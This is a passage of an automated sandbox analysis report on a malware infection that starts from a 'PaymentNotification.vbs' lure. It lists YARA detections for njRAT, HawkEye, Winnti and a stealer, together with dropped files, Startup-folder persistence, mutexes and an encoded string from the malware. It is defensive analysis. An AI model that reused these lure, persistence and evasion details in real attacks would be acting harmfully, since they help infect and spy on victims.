Source: 0.3.wscript.exe.1b8660a7cb0.0.unpack, type: UNPACKEDPE Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.wscript.exe.1b8660a7cb0.0.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.3.wscript.exe.1b8660a7cb0.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.wscript.exe.1b8660a7cb0.0.raw.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.3.wscript.exe.1b8660a7cb0.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.wscript.exe.1b8660a7cb0.1.raw.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.0.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.3.wscript.exe.1b8660a7cb0.1.unpack, type: UNPACKEDPE Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.wscript.exe.1b8660a7cb0.1.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 13.2.tmpFB21.tmp.exe.8150000.11.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.tmpFB21.tmp.exe.8100000.10.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPE Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPE Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.servieda.exe.a0000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.servieda.exe.a0000.0.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 3.0.servieda.exe.a0000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.0.servieda.exe.a0000.0.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 1.2.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPE Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPE Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.tmpFB21.tmp.exe.3068cf8.5.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.tmpFB21.tmp.exe.3048e00.4.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.tmpFB21.tmp.exe.3048e00.4.raw.unpack, type: UNPACKEDPE Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: Tmp.exe.0.dr, SlayerRAT.cs Base64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'
Source: servieda.exe.1.dr, SlayerRAT.cs Base64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'
Source: 1.0.Tmp.exe.1d0000.0.unpack, SlayerRAT.cs Base64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'
Source: 1.2.Tmp.exe.1d0000.0.unpack, SlayerRAT.cs Base64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'
Source: d4c6a6df7bab3dad31763de990c4ed82.exe.3.dr, SlayerRAT.cs Base64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'
Source: 3.2.servieda.exe.a0000.0.unpack, SlayerRAT.cs Base64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'
Source: 3.0.servieda.exe.a0000.0.unpack, SlayerRAT.cs Base64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'
Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, SlayerRAT.cs Base64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'
Source: classification engine Classification label: mal100.phis.troj.adwa.spyw.evad.winVBS@22/17@5/5
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Code function: 2_2_0498268E AdjustTokenPrivileges, 2_2_0498268E
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Code function: 2_2_04982657 AdjustTokenPrivileges, 2_2_04982657
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_02CC54FA AdjustTokenPrivileges, 13_2_02CC54FA
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_02CC54C3 AdjustTokenPrivileges, 13_2_02CC54C3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 14_2_0040ED0B FindResourceA,SizeofResource,LoadResource,LockResource, 14_2_0040ED0B
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\codigo[1].txt Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Mutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4860:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:956:120:WilError_01
Source: C:\Users\user\AppData\Roaming\servieda.exe Mutant created: \Sessions\1\BaseNamedObjects\d4c6a6df7bab3dad31763de990c4ed82
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\Tmp.exe Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\PaymentNotification.vbs'
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe System information queried: HandleInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
